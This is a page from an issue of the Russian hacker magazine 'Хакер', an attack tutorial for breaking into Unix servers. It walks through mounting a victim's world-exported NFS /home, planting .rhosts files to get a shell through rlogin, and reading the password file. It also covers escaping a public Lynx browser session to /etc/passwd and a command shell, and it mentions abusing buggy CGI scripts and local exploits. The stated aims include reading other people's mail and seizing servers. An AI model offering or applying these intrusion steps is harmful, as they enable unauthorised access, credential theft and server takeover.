Электронная библиотека

Хакер


Хакер

Рубрика: Юниксоид

Xakep Online -> Журнал, номер #008, стр. 008-034-4


mal# su name

(name = имя суперпользователя, которого ты добавишь).

Теперь у нас полный доступ к системе. Мы можем заменить страницу, прочитать чужую почту, а можно приспособить их сервер для своих нужд, но придется поработать (чтобы другой хакер не захватил этот сервер в свои руки, нужно закрыть все имеющиеся дырки).

Подключение расшаренных ресурсов других Юникс систем, используя NFS (Network File System).

Вот еще один способ, с помощью которого можно получить файл с паролями или шелл. Для этого нужно проверить, какие директории жертвы доступны для подключения всем. Это можно посмотреть с помощью команды:

hax0r# showmount -e satan.****.ru

export list for satan.****.ru:

/home (everyone)

/var (everyone)

/usr easy

/export/root/easy easy

/export/swap/easy easy

(everyone) - говорит нам о том, что этот каталог доступен всем, администратор этого сервера, наверно, не думал, что он также доступен и для удаленных пользователей, но мы живем не в волшебной стране, думать хорошо, но лучше быть уверенным :).

Подключить каталог к своему Юниксу можно с помощью команды:

hax0r# mkdir sucks

hax0r# mount satan.****.ru:/home sucks

Теперь, зайдя в каталог sucks/ на нашем компе, мы попадем на сервер satan.****.ru в папку /home. Теперь можем создать файл .rhosts в папке любого пользователя и залогиниться на сервер используя rlogin, получить шелл и прочитать файл с паролями. Бывает так, что все могут подключать корневой каталог, тогда можно прочитать файл с паролями сразу.

Lynx

Часто бывает, что админы делают публичный доступ к текстовому броузеру Lynx, например:

hax0r# telnet very.nice.edu

Connected to very.nice.edu

Escape character is '^]'.

SCO OpenServer(TM) Release 5 (very.nice.edu) (ttyp0)

Login as lynx for text based browser lynx

login:lynx

стартуется броузер lynx

Жмем g, набираем file:/etc/passwd и получаем файл с паролями. Если файл-URL'ы запрещены, то в опциях ставим Bookmark /etc/passwd, затем сохраняем, жмем V и получаем файл с паролями. Если редактировать Local Editor, то поставь его /bin/bash. Чтобы получить командную строку, нажимаем E.

Lynxexec:/bin/sh - получаем командную строку.

telnet://satan.****.ru - нажимаем Ctrl + ] вводим ! и получаем командную строку.

Cgi-баги

Существует много дырявых perl-скриптов, поставляемых по умолчанию вместе с web-серверами или установленных самими администраторами. С помощью них нельзя получить права суперпользователя, но можно выполнять удаленные команды с правами пользователя, из под которого запущен веб-сервер. Для нахождения дырявых скриптов существует большое количество сканеров, приобрести (читай - скачать) которые можно на серверах, посвященных безопасности.

Локальный взлом

Если у тебя уже есть доступ к системе, то можно получить права суперпользователя локально. Для этого можно использовать локальные эксплоиты или другие утилиты, такие как сниферы, трояны, системы аудитинга безопасности (cops, satan), которые проверяют наличие незапароленных бюджетов пользователей, правильность атрибутов файлов, ищут SUID файлы и т.п.

Назад на стр. 008-034-3  Содержание  Вперед на стр. 008-034-5